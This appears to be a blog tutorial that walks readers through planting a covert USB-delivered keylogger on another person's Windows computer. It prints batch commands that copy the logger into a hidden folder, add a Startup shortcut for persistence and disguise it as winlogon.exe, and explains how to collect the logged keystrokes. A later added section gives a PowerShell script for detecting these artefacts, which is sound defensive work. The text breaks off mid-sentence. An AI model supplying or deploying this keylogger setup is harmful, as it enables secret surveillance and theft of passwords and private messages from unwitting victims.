Let’s say your “friend” has some “secret nuclear launch codes” in his computer that he is going to sell for a lot of rapper money, and you want to “save the world” by intercepting those launch codes so you could alert the government. Now, based on this assumption, I’ll show you how to record the keystrokes your “friend”—well—strokes; silently, without raising any suspicion using just a USB stick.
• Records timestamps of keys pressed
• Records the current window in which the keys are being pressed like Google, YouTube, Facebook, etc.
• Records non-alphanumeric keys as well such as Esc, Space, Enter, Ctrl, etc.
• Automatically gets copied into the system (or you can choose a custom location of storage) to be hidden and executed even after the USB stick is plugged out
• Automatically gets copied into the Startup folder to be executed every time the system is turned on (so does not stop recording once the system reboots)
• Well hidden and disguised as a Windows system file. You can choose between two Task Manager icons in my kit, to your liking. Option 1 is easier to find in order to kill quickly, while option 2 is harder to find at the cost of being a little tougher to kill quickly
• File version information (Details tab in Properties) disguised as a legitimate Windows file as well; ergo, quite difficult to spot
• Written in Python, and wrapped up into a convenient and not-messy-or-all-over-the-place beautiful little all-in-one single executable file (.exe) for easy and independent execution
Oh, wait, it’s disclaimer dropping time.
Disclaimer: I will not be responsible for any sort of trouble that you might get yourself into—if you do; and this guide solely exists for ethical and educational purposes.
There, it’s in red and italics too. Let’s get to saving the world!
Step 1: Download the tool required
You’re going to need the little kit that I made for this, which you can download from here.
Password: 123456 (Had to set a password so that MediaFire doesn’t flag the file as a virus. I guarantee you it’s a false positive, 100% safe, I scanned it myself with the latest updated signature database of ESET NOD32 Antivirus)
After the download is complete, extract the .RAR file anywhere you like and you’ll now have the folder “logs” there, with the following files in it:
Step 2: Plug the USB stick in
Take the USB stick which you want to turn into the keylogging tool, and plug it into your computer.
Step 3: Install the tool onto the USB stick
Now, copy the “logs” folder as extracted, and paste it into the USB stick.
You’re pretty much done here!
Step 4: Test the stick on your own / “friend’s” computer
Plug the USB stick into the computer and run the regular batch file (create_dmp.bat).
NOTE: If you’re having trust issues, you can right-click the .bat file and click on “Edit” to see the commands that will be executed when you click on the .bat file for real. The purpose of each line in that file is also explained below:
xcopy "%CD%\init.dll.lnk" "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" [Copies a shortcut of the keylogger into the Startup folder]
xcopy "%CD%\winlogon.exe" "%HOMEDRIVE%\tmp\winsvr\logon\" /O /X /H /K /I [Copies the keylogger into the system (default or custom location)]
attrib +h %HOMEDRIVE%\tmp [Makes the keylogger folder in the system (default or custom location) hidden]
start %CD%\init.dll.lnk [Executes the keylogger and exits the command prompt window as soon as all the commands are executed]
Now, once you’ve actually double-clicked on the .bat file like a big boy, you’ll see a command prompt window flash in front of you, run all the above commands, and then automatically exit; all in a quick flash. If you are fortunate enough to take a quick screenshot of this wild entity in its prime execution in its habitat, you might have a glimpse of something that looks like this:
NOTE: If you get the “Access denied” and/or “path specified does not exist” message(s), you may not have the required privilege to copy the files into the main OS drive partition’s root (typically C:\). So, run the custom location batch file (create_dmp_custom.bat) instead of the regular batch file (create_dmp.bat) to copy the files into a custom location of your choice instead of the main OS drive partition’s root; it will ask you which folder you would like to choose for the dumping, and it even has a neat and convenient GUI folder browser as well!
The command prompt window flashing itself just once and vanishing into volatility means the tool is successfully running in the background now. Unplug your USB stick from the system, and let the keylogger sit in the system, collecting intel.
Step 5: Extract the collected intel
Now, whenever you want to extract the logged data, navigate to the tool’s default “OS-DRIVE-PARTITION-LETTER:\tmp\winsvr\logon\” folder or the custom folder you had chosen when you ran the custom location batch file.
NOTE: This folder will always be hidden, so make sure you enable viewing hidden files and folders to see the dump.
Inside the folder you’ll see the file “access.log”, as shown below:
That’s the text file where all the keystrokes are recorded. Open it (with Notepad, if it asks), and you’ll see something like this:
Those are the keystrokes being logged into the text file, along with the window the keystrokes are logged from and also the timestamp of each keystroke.
There, you’ve done it! You now have perhaps the deadliest of keylogging devices that fits right in your pocket. Go, save the world!
How Good is it at Hiding?
TL;DR: Very good.
This keylogger disguises itself as “winlogon” in the Windows Task Manager, which is a system file that deals with Windows Logon. Hence, this decreases suspicion by a huge factor. It looks like this in the Task Manager:
Even the file version information is all the same as the genuine winlogon.exe file. Here’s the comparison between the real and keylogging winlogon.exe processes:
I choose to use the blue icon variant of the winlogon process because I can easily distinguish it, but using the green one adds more credibility at the cost of being a little tough to distinguish and kill. Also know that if you happen to kill the actual winlogon process, you will automatically be logged out of your Windows account immediately and be sent straight back to the Windows login screen.
NOTE: The default icon variant in this kit is blue. If you want the green variant instead, copy “winlogon.exe” from the “Green Icon” folder and paste (overwrite) it in the main “logs” folder before running the batch file.
Fixing / Reversing the Effects
To reverse everything you just did in case you are compromised and your cover is blown:
• Open the Task Manager, select the specific “winlogon” process which has about 4,000 K in the “Memory” column (that’s the decoy/keylogging one), and kill it by right-clicking on it and selecting “End task”
• Delete the “tmp” folder (not TEMP) from your main OS drive partition (typically C:) OR the custom folder you had chosen when you used the custom location batch file
• Delete the “init.dll” shortcut in the Startup folder, or the “init.dll_” shortcut if you used the custom location batch file — You might have to enable viewing hidden files and folders to see the AppData folder
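If you are on the other side of this, cleaning up a machine rather than planting the stick, the three artefacts described above (the look-alike process, the Startup shortcut and the hidden drop folder) are also what you check for. The script below is an added example and is not code from the original post or from the kit; it assumes Windows PowerShell 5.1 or later, the default drop location and shortcut name described in the walkthrough (winlogon.exe under the OS drive’s tmp\winsvr\logon folder, init.dll.lnk or init.dll_ in the per-user Startup folder), and a hypothetical helper Add-Finding that it defines itself. The memory-column trick from the removal steps is not relied on, because the process’s image path and signature are a far more reliable tell than its icon, version details or memory footprint.

```powershell
# Added example, not part of the original post or the kit. Triage script for
# the artefacts the walkthrough leaves behind: an impostor winlogon.exe process,
# a shortcut in the per-user Startup folder, and a hidden tmp folder on the OS
# drive. Assumes Windows PowerShell 5.1+; run it as the account that was logged
# on when the USB stick was used.

$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Indicator, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Indicator = $Indicator; Detail = $Detail })
}

# 1. Process check. The genuine winlogon.exe is loaded from System32 and is
#    Microsoft-signed; the decoy only borrows its name, icon and version info.
$legitPath = Join-Path $env:SystemRoot 'System32\winlogon.exe'
foreach ($p in Get-Process -Name winlogon -ErrorAction SilentlyContinue) {
    $path = $p.Path   # $null for the real, SYSTEM-owned process when not elevated
    if (-not $path) { continue }
    if ($path -ne $legitPath) {
        $sig = (Get-AuthenticodeSignature -FilePath $path).Status
        Add-Finding 'Impostor winlogon.exe process' "PID $($p.Id) running from $path (signature: $sig)"
    }
}

# 2. Startup folder. Resolve each shortcut's target rather than trusting its
#    name, so the renamed shortcut (init.dll_) from the custom batch file is
#    found too, as is any shortcut pointing at a winlogon.exe outside System32.
$startup = Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup'
$shell = New-Object -ComObject WScript.Shell
foreach ($lnk in Get-ChildItem -Path $startup -Filter *.lnk -Force -ErrorAction SilentlyContinue) {
    $target = $shell.CreateShortcut($lnk.FullName).TargetPath
    $suspicious = ($lnk.Name -like 'init.dll*') -or
                  ($target -and ([IO.Path]::GetFileName($target) -ieq 'winlogon.exe') -and ($target -ne $legitPath))
    if ($suspicious) {
        Add-Finding 'Startup shortcut' "$($lnk.FullName) -> $target"
    }
}

# 3. Default drop folder. -Force is required because the batch file sets the
#    hidden attribute on <OS drive>\tmp, so a plain Get-Item will not see it.
$tmp = Get-Item -Path "$env:HOMEDRIVE\tmp" -Force -ErrorAction SilentlyContinue
$tmpHidden = $tmp -and (($tmp.Attributes -band [IO.FileAttributes]::Hidden) -ne 0)
$drop = "$env:HOMEDRIVE\tmp\winsvr\logon"
foreach ($name in 'winlogon.exe', 'access.log') {
    $f = Get-Item -Path (Join-Path $drop $name) -Force -ErrorAction SilentlyContinue
    if ($f) {
        Add-Finding 'Drop folder artefact' "$($f.FullName) ($($f.Length) bytes; tmp hidden: $tmpHidden)"
    }
}

if ($findings.Count -eq 0) {
    'No indicators from this walkthrough were found.'
} else {
    $findings | Format-Table -AutoSize
    ''
    'Clean-up order: stop the flagged PID(s) with Stop-Process -Id <pid> (not Stop-Process -Name winlogon,'
    'which also ends the real logon process and drops you to the login screen), then delete the'
    'shortcut(s) and the drop folder listed above.'
}
```

Two design points matter here. Matching on the image path and Authenticode status answers the “How good is it at hiding?” question from the defender’s side: an icon and a copied Details tab never survive a path comparison against System32. And the script reports PIDs rather than killing anything, because the page itself notes that ending the real winlogon process logs you out, so the operator should stop the flagged PID explicitly instead of killing by name.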
The Startup folder is located in: